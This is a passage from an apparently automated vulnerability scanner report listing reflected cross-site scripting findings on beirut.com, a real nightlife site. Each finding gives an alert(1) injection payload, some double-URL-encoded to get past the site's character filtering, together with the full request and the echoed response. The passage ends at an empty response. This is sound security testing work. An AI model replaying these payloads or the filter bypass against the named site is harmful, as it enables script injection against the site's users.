Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Index';
var initfacebox='';
var contactid='188577985';alert(1)//f4366c598f1';
var showfacebox='';
</script>
...[SNIP]...

4.583. http://www.beirut.com/Nightlife/Hamra/Li-Beirut/1885 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Hamra/Li-Beirut/1885

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 739ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9ee313d100 was submitted in the REST URL parameter 4. This input was echoed as 739ea"><script>alert(1)</script>e9ee313d100 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Hamra/Li-Beirut/1885739ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9ee313d100 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 09:53:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=1885739ea"><script>alert(1)</script>e9ee313d100&randstyle=magenta">
...[SNIP]...

4.584. http://www.beirut.com/Nightlife/Karantina/The-Library/113 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Karantina/The-Library/113

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf766%2527%253balert%25281%2529%252f%252fdab6e86b190 was submitted in the REST URL parameter 4. This input was echoed as cf766';alert(1)//dab6e86b190 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Karantina/The-Library/113cf766%2527%253balert%25281%2529%252f%252fdab6e86b190 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:09:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Index';
var initfacebox='';
var contactid='113cf766';alert(1)//dab6e86b190';
var showfacebox='';
</script>
...[SNIP]...

4.585. http://www.beirut.com/Nightlife/Karantina/The-Library/113 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Karantina/The-Library/113

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 499fc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee13cecdbede was submitted in the REST URL parameter 4. This input was echoed as 499fc"><script>alert(1)</script>e13cecdbede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Karantina/The-Library/113499fc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee13cecdbede HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:08:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=113499fc"><script>alert(1)</script>e13cecdbede&randstyle=magenta">
...[SNIP]...

4.586. http://www.beirut.com/Nightlife/Karaoke-Lounges/8094927980 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Nightlife/Karaoke-Lounges/8094927980

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490b3"><a>c6bc1c1db89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife490b3"><a>c6bc1c1db89/Karaoke-Lounges/8094927980 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:24:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife490b3"><a>c6bc1c1db89">
...[SNIP]...

4.587. http://www.beirut.com/Nightlife/Karaoke-Lounges/8094927980 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Karaoke-Lounges/8094927980

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa742'-alert(1)-'1119fa96d9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlifeaa742'-alert(1)-'1119fa96d9b/Karaoke-Lounges/8094927980 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:33:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Nightlifeaa742'-alert(1)-'1119fa96d9b/Karaoke-Lounges';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.588. http://www.beirut.com/Nightlife/Karaoke-Lounges/8094927980 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Karaoke-Lounges/8094927980

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1d11'-alert(1)-'19f394ddeac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlife/Karaoke-Loungesa1d11'-alert(1)-'19f394ddeac/8094927980 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:37:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Nightlife/Karaoke-Loungesa1d11'-alert(1)-'19f394ddeac';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.589. http://www.beirut.com/Nightlife/Lounges/9663063907 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Nightlife/Lounges/9663063907

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68cce"><a>358e2b3d9f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife68cce"><a>358e2b3d9f2/Lounges/9663063907 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:17:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife68cce"><a>358e2b3d9f2">
...[SNIP]...

4.590. http://www.beirut.com/Nightlife/Lounges/9663063907 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Lounges/9663063907

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3604c'-alert(1)-'a12939d24e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlife3604c'-alert(1)-'a12939d24e8/Lounges/9663063907 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:24:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Nightlife3604c'-alert(1)-'a12939d24e8/Lounges';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.591. http://www.beirut.com/Nightlife/Lounges/9663063907 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Lounges/9663063907

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf60'-alert(1)-'bf7ec8f366e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlife/Loungesdbf60'-alert(1)-'bf7ec8f366e/9663063907 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:29:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Nightlife/Loungesdbf60'-alert(1)-'bf7ec8f366e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.592. http://www.beirut.com/Nightlife/Nightclubs/311071488 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Nightclubs/311071488

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3af5'-alert(1)-'09ceb507a40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlifea3af5'-alert(1)-'09ceb507a40/Nightclubs/311071488 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:26:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Nightlifea3af5'-alert(1)-'09ceb507a40/Nightclubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.593. http://www.beirut.com/Nightlife/Nightclubs/311071488 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Nightlife/Nightclubs/311071488

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49148"><a>74117d2cdce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife49148"><a>74117d2cdce/Nightclubs/311071488 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:21:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife49148"><a>74117d2cdce">
...[SNIP]...

4.594. http://www.beirut.com/Nightlife/Nightclubs/311071488 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Nightclubs/311071488

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61c2a'-alert(1)-'96f348522ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlife/Nightclubs61c2a'-alert(1)-'96f348522ed/311071488 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:31:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Nightlife/Nightclubs61c2a'-alert(1)-'96f348522ed';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.595. http://www.beirut.com/Nightlife/Pubs/242334555 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Pubs/242334555

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7fca'-alert(1)-'bcd7c3d350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlifee7fca'-alert(1)-'bcd7c3d350/Pubs/242334555 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

